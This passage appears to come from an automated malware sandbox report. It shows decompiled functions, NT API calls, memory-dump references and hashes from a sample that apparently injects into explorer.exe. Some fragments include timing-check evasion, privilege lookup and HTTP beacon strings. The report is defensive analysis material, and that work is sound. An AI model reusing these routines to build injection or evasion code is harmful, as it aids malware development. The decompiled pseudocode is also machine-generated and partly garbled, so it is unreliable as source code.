                                                                                                                                                    • NtCreateFile.NTDLL(00000060,00E38B03,?,00E43BA7,00E38B03,FFFFFFFF,?,?,FFFFFFFF,00E38B03,00E43BA7,?,00E38B03,00000060,00000000,00000000), ref: 00E4821D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000012.00000002.403260646.0000000000E31000.00000020.00020000.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                                    • Associated: 00000012.00000002.403244215.0000000000E30000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000012.00000002.403285089.0000000000E4D000.00000040.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000012.00000002.403299857.0000000000E4E000.00000020.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                    • Instruction ID: be78497a223fd2fbda287f0dd83e7df12eaa9efdf4db884399047d9b67b50d14
                                                                                                                                                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                    • Instruction Fuzzy Hash: 85F0B2B2201208ABCB08DF88DC95EEB77EDAF8C754F158248BA0D97241C630E8118BA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00E483AA, Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00E48FA4,?,00000000,?,00003000,00000040,00000000,00000000,00E38B03), ref: 00E483E9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000012.00000002.403260646.0000000000E31000.00000020.00020000.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                                    • Associated: 00000012.00000002.403244215.0000000000E30000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000012.00000002.403285089.0000000000E4D000.00000040.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000012.00000002.403299857.0000000000E4E000.00000020.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2167126740-0
                                                                                                                                                    • Opcode ID: 9131e849a95ac20ef650576ce81b77c773a0c011e65fc468b109dcf40d320600
                                                                                                                                                    • Instruction ID: 76fd333b0f3bbf760c71bc2a0339aedcba3ff1334777b0525b9225ea9eb7cda7
                                                                                                                                                    • Opcode Fuzzy Hash: 9131e849a95ac20ef650576ce81b77c773a0c011e65fc468b109dcf40d320600
                                                                                                                                                    • Instruction Fuzzy Hash: 4FF08CB1200049ABCB04DFA8ED84CAB77ADEF88210B158749F94CA7206C634E8158BA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00E483B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00E48FA4,?,00000000,?,00003000,00000040,00000000,00000000,00E38B03), ref: 00E483E9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000012.00000002.403260646.0000000000E31000.00000020.00020000.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                                    • Associated: 00000012.00000002.403244215.0000000000E30000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000012.00000002.403285089.0000000000E4D000.00000040.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000012.00000002.403299857.0000000000E4E000.00000020.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2167126740-0
                                                                                                                                                    • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                    • Instruction ID: 28063e08b1bd38dae4f6ead9bb8a2f4c93b700112f2eeee1a989993ae5c9b01e
                                                                                                                                                    • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                    • Instruction Fuzzy Hash: 3DF015B2200208ABCB14DF89DC81EAB77ADAF88750F118148BE08A7241C630F810CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00E388C0, Relevance: .1, Instructions: 92COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                    			E00E388C0(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00E36E10(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00E37020( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E00E49CE0( &_v284, 0x104);
						E00E4A350( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00E43DE0(E00E43D80(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1a5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00E37050( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E00E370D0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                                                                                                                                                    0x00e388cb
                                                                                                                                                    0x00e388d3
                                                                                                                                                    0x00e388d5
                                                                                                                                                    0x00e388da
                                                                                                                                                    0x00e388df
                                                                                                                                                    0x00e388f2
                                                                                                                                                    0x00e388f7
                                                                                                                                                    0x00e38900
                                                                                                                                                    0x00e3890c
                                                                                                                                                    0x00e3891f
                                                                                                                                                    0x00e38924
                                                                                                                                                    0x00e38927
                                                                                                                                                    0x00e38930
                                                                                                                                                    0x00e38942
                                                                                                                                                    0x00e38947
                                                                                                                                                    0x00e3894c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00e3894e
                                                                                                                                                    0x00e38952
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00e38954
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00e38952
                                                                                                                                                    0x00e38956
                                                                                                                                                    0x00e38959
                                                                                                                                                    0x00e3895f
                                                                                                                                                    0x00e38961
                                                                                                                                                    0x00e3896c
                                                                                                                                                    0x00e38971
                                                                                                                                                    0x00e38974
                                                                                                                                                    0x00e38981
                                                                                                                                                    0x00e3898c
                                                                                                                                                    0x00e3898e
                                                                                                                                                    0x00e38994
                                                                                                                                                    0x00e38998
                                                                                                                                                    0x00e3899b
                                                                                                                                                    0x00e3899b
                                                                                                                                                    0x00e389a2
                                                                                                                                                    0x00e389a5
                                                                                                                                                    0x00e389aa
                                                                                                                                                    0x00e389b7
                                                                                                                                                    0x00e388e6
                                                                                                                                                    0x00e388e6
                                                                                                                                                    0x00e388e6

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000012.00000002.403260646.0000000000E31000.00000020.00020000.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                                    • Associated: 00000012.00000002.403244215.0000000000E30000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000012.00000002.403285089.0000000000E4D000.00000040.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000012.00000002.403299857.0000000000E4E000.00000020.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 032a55e082582ccb0368df15895b437100a307578c54be1b2327f9a09fe37fb3
                                                                                                                                                    • Instruction ID: 3d6976b434741e5572edf62429d529952ab7e01fbbe746193960a7857c68cea1
                                                                                                                                                    • Opcode Fuzzy Hash: 032a55e082582ccb0368df15895b437100a307578c54be1b2327f9a09fe37fb3
                                                                                                                                                    • Instruction Fuzzy Hash: 8D2128B2C443085BCB24D674AE42BFF77BC9B50304F04146DF98DA2001FA35AB08CBA2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00E484A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00E484A0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E00E48DD0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0xe43526
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}





                                                                                                                                                    0x00e484b7
                                                                                                                                                    0x00e484c2
                                                                                                                                                    0x00e484cd
                                                                                                                                                    0x00e484d1

                                                                                                                                                    APIs
                                                                                                                                                    • RtlAllocateHeap.NTDLL(&5,?,00E43C9F,00E43C9F,?,00E43526,?,?,?,?,?,00000000,00E38B03,?), ref: 00E484CD
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000012.00000002.403260646.0000000000E31000.00000020.00020000.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                                    • Associated: 00000012.00000002.403244215.0000000000E30000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000012.00000002.403285089.0000000000E4D000.00000040.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000012.00000002.403299857.0000000000E4E000.00000020.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                    • String ID: &5
                                                                                                                                                    • API String ID: 1279760036-996528113
                                                                                                                                                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                    • Instruction ID: d0b8334338f0cec4d761f59cea0ff97ba64c642c87129a55d1a2674ecd823a53
                                                                                                                                                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                    • Instruction Fuzzy Hash: D1E04FB1200208ABD714EF59DC41EA777ACEF88750F114558FE085B241C630F910CBF0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00E37270, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                    			E00E37270(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;

				_v68 = 0;
				E00E49D30( &_v67, 0, 0x3f);
				E00E4A910( &_v68, 3);
				_t12 = E00E39B30(_a4 + 0x1c,  &_v68); // executed
				_t13 = E00E43E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00E39290(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}











                                                                                                                                                    0x00e3727f
                                                                                                                                                    0x00e37283
                                                                                                                                                    0x00e3728e
                                                                                                                                                    0x00e3729e
                                                                                                                                                    0x00e372ae
                                                                                                                                                    0x00e372b3
                                                                                                                                                    0x00e372ba
                                                                                                                                                    0x00e372bd
                                                                                                                                                    0x00e372ca
                                                                                                                                                    0x00e372cc
                                                                                                                                                    0x00e372ce
                                                                                                                                                    0x00e372eb
                                                                                                                                                    0x00e372eb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00e372ed
                                                                                                                                                    0x00e372f2

                                                                                                                                                    APIs
                                                                                                                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 00E372CA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000012.00000002.403260646.0000000000E31000.00000020.00020000.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                                    • Associated: 00000012.00000002.403244215.0000000000E30000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000012.00000002.403285089.0000000000E4D000.00000040.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000012.00000002.403299857.0000000000E4E000.00000020.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessagePostThread
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1836367815-0
                                                                                                                                                    • Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                                                                                                    • Instruction ID: 6ca38e05ab89acf9f85c4166c466ad1bace386492f72ad47c10164d43ae32806
                                                                                                                                                    • Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                                                                                                    • Instruction Fuzzy Hash: 0101A271A8022877F720A694AC43FFF7BAC5B40B51F150518FF04BA1C2E6E46A0686F6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00E484D6, Relevance: 1.5, APIs: 1, Instructions: 26memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                    			E00E484D6(void* __edx, void* __esi, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t11;
				void* _t18;
				signed int _t20;

				asm("in al, dx");
				_t20 =  *(__esi - 0x55da880b) * 0x8b55bbda;
				_t8 = _a4;
				_push(_t20);
				_t4 = _t8 + 0xc74; // 0xc74
				E00E48DD0(_t18, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t11 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t11;
			}






                                                                                                                                                    0x00e484d7
                                                                                                                                                    0x00e484d8
                                                                                                                                                    0x00e484e3
                                                                                                                                                    0x00e484e9
                                                                                                                                                    0x00e484ef
                                                                                                                                                    0x00e484f7
                                                                                                                                                    0x00e4850d
                                                                                                                                                    0x00e48511

                                                                                                                                                    APIs
                                                                                                                                                    • RtlFreeHeap.NTDLL(00000060,00E38B03,?,?,00E38B03,00000060,00000000,00000000,?,?,00E38B03,?,00000000), ref: 00E4850D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000012.00000002.403260646.0000000000E31000.00000020.00020000.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                                    • Associated: 00000012.00000002.403244215.0000000000E30000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000012.00000002.403285089.0000000000E4D000.00000040.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000012.00000002.403299857.0000000000E4E000.00000020.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                                    • Opcode ID: 18235e5ba3e65a5875924be5ede62eeada1f4f098f548615a01a9af98a84ee9f
                                                                                                                                                    • Instruction ID: aa22f3c801746210f1a15e3f6429087e27ed8c7515f47c12bd927fe239ca25c7
                                                                                                                                                    • Opcode Fuzzy Hash: 18235e5ba3e65a5875924be5ede62eeada1f4f098f548615a01a9af98a84ee9f
                                                                                                                                                    • Instruction Fuzzy Hash: 07E092B16002046FD714DF54DC45EE77BACEF98350F01855AFD48A7291C631ED01CAA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00E48631, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 79%
                                                                                                                                                    			E00E48631(void* __eax, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t16;

				asm("adc [ebp+0x33], esi");
				 *(__ecx - 0x741374ab) =  *(__ecx - 0x741374ab) << 0x45;
				_t13 = _a4;
				E00E48DD0(__edi, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t13 + 0xa18)), 0, 0x46);
				_t16 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t16;
			}




                                                                                                                                                    0x00e48638
                                                                                                                                                    0x00e4863e
                                                                                                                                                    0x00e48643
                                                                                                                                                    0x00e4865a
                                                                                                                                                    0x00e48670
                                                                                                                                                    0x00e48674

                                                                                                                                                    APIs
                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,00E3CFB2,00E3CFB2,00000041,00000000,?,00E38B75), ref: 00E48670
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000012.00000002.403260646.0000000000E31000.00000020.00020000.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                                    • Associated: 00000012.00000002.403244215.0000000000E30000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000012.00000002.403285089.0000000000E4D000.00000040.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000012.00000002.403299857.0000000000E4E000.00000020.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3899507212-0
                                                                                                                                                    • Opcode ID: 848fdda19ee4d7bddb4ff30ae1fc22fbf5ed57f24b8162ed8e9c5d318563e478
                                                                                                                                                    • Instruction ID: 781d1530c3febb10f46dc95b37043ba5b82c146439a60ccb06944616fb0d5747
                                                                                                                                                    • Opcode Fuzzy Hash: 848fdda19ee4d7bddb4ff30ae1fc22fbf5ed57f24b8162ed8e9c5d318563e478
                                                                                                                                                    • Instruction Fuzzy Hash: A3F0E5B12042506BD715EF54DC80EDB7FA8EF85610F04849EFC482B143C630E904CBB0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00E484E0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00E484E0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E00E48DD0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                                                                                    0x00e484ef
                                                                                                                                                    0x00e484f7
                                                                                                                                                    0x00e4850d
                                                                                                                                                    0x00e48511

                                                                                                                                                    APIs
                                                                                                                                                    • RtlFreeHeap.NTDLL(00000060,00E38B03,?,?,00E38B03,00000060,00000000,00000000,?,?,00E38B03,?,00000000), ref: 00E4850D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000012.00000002.403260646.0000000000E31000.00000020.00020000.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                                    • Associated: 00000012.00000002.403244215.0000000000E30000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000012.00000002.403285089.0000000000E4D000.00000040.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000012.00000002.403299857.0000000000E4E000.00000020.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                    • Instruction ID: 70320592da958b0f78cd3c43ce74127b29b6a47b02c1b14061a34e833cf90610
                                                                                                                                                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                    • Instruction Fuzzy Hash: 74E04FB12002086BD714EF59DC45EA777ACEF88750F014554FD0857241C630F910CAF0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00E48640, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00E48640(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E00E48DD0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                                                                                    0x00e4865a
                                                                                                                                                    0x00e48670
                                                                                                                                                    0x00e48674

                                                                                                                                                    APIs
                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,00E3CFB2,00E3CFB2,00000041,00000000,?,00E38B75), ref: 00E48670
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000012.00000002.403260646.0000000000E31000.00000020.00020000.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                                    • Associated: 00000012.00000002.403244215.0000000000E30000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000012.00000002.403285089.0000000000E4D000.00000040.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000012.00000002.403299857.0000000000E4E000.00000020.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3899507212-0
                                                                                                                                                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                    • Instruction ID: 6728ef0e6e2645b59d28cc43278a51f7c8e91f5cbfc46f85da06b23e9841a406
                                                                                                                                                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                    • Instruction Fuzzy Hash: 9FE01AB16002086BDB10EF49DC85EEB37ADAF88650F018154BA0867241CA30E8108BF5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00E48520, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00E48520(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E00E48DD0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                                                                                                                    0x00e48523
                                                                                                                                                    0x00e4853a
                                                                                                                                                    0x00e48548

                                                                                                                                                    APIs
                                                                                                                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00E48548
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000012.00000002.403260646.0000000000E31000.00000020.00020000.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                                    • Associated: 00000012.00000002.403244215.0000000000E30000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000012.00000002.403285089.0000000000E4D000.00000040.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000012.00000002.403299857.0000000000E4E000.00000020.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExitProcess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 621844428-0
                                                                                                                                                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                    • Instruction ID: 06aad0b27d91ecc4b81d4a08337510bfe3a4aaf4c28c5e8424556ee154323164
                                                                                                                                                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                    • Instruction Fuzzy Hash: 7CD012716002187BD620EF98DC85FD7779CDF48750F018065BA1C6B241C571BA0086E1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Non-executed Functions

                                                                                                                                                    Function 00E45630, Relevance: .1, Instructions: 60COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000012.00000002.403260646.0000000000E31000.00000020.00020000.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                                    • Associated: 00000012.00000002.403244215.0000000000E30000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000012.00000002.403285089.0000000000E4D000.00000040.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000012.00000002.403299857.0000000000E4E000.00000020.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 008901037cd02273d015754057201ac7d45da6306fd90d8ba6595ee119797382
                                                                                                                                                    • Instruction ID: 9171eea83d6ea75de4707c0a1cebe6d90a281be4940230aae8b42dcd47ed75bf
                                                                                                                                                    • Opcode Fuzzy Hash: 008901037cd02273d015754057201ac7d45da6306fd90d8ba6595ee119797382
                                                                                                                                                    • Instruction Fuzzy Hash: 2401892791C5C546D313CE2518902F5FBE2EA53634FAA13DDCCD01BA43D1139C1A8385
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00E36A9C, Relevance: .0, Instructions: 18COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000012.00000002.403260646.0000000000E31000.00000020.00020000.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                                    • Associated: 00000012.00000002.403244215.0000000000E30000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000012.00000002.403285089.0000000000E4D000.00000040.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000012.00000002.403299857.0000000000E4E000.00000020.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: fd5bf51ac423cc0babb5561f9551d64e91a49a43e6c370562d226a5f915e611c
                                                                                                                                                    • Instruction ID: eb904742bcb6c30f2937120b9c480cfb174edc9808c62e130bbbe60c4b4783e4
                                                                                                                                                    • Opcode Fuzzy Hash: fd5bf51ac423cc0babb5561f9551d64e91a49a43e6c370562d226a5f915e611c
                                                                                                                                                    • Instruction Fuzzy Hash: 9CC09B37E5604509E5509C4C78421B4E7D5D3D7135F6137B7FC14B7510D48FD8A70149
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Analysis Process: explorer.exe PID: 3388 Parent PID: 4652 explorer.exeCOMMON

                                                                                                                                                    Executed Functions

                                                                                                                                                    Function 063BA302, Relevance: 23.7, APIs: 3, Strings: 10, Instructions: 911networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000013.00000002.503012197.00000000062C0000.00000040.00000001.sdmp, Offset: 062C0000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: getaddrinforecvsetsockopt
                                                                                                                                                    • String ID: Co$&br=$&un=$: cl$=$GET $dat=$nnec$ose$tion
                                                                                                                                                    • API String ID: 1564272048-2976227712
                                                                                                                                                    • Opcode ID: b31e8b864956b6b4abfa9b859ad4291af29cc5130ca763e476aa0a2d5a1583bf
                                                                                                                                                    • Instruction ID: 7b08e151052acbd3ef233263af4b92ba0c30cada400f618e00eee8b19e6572f0
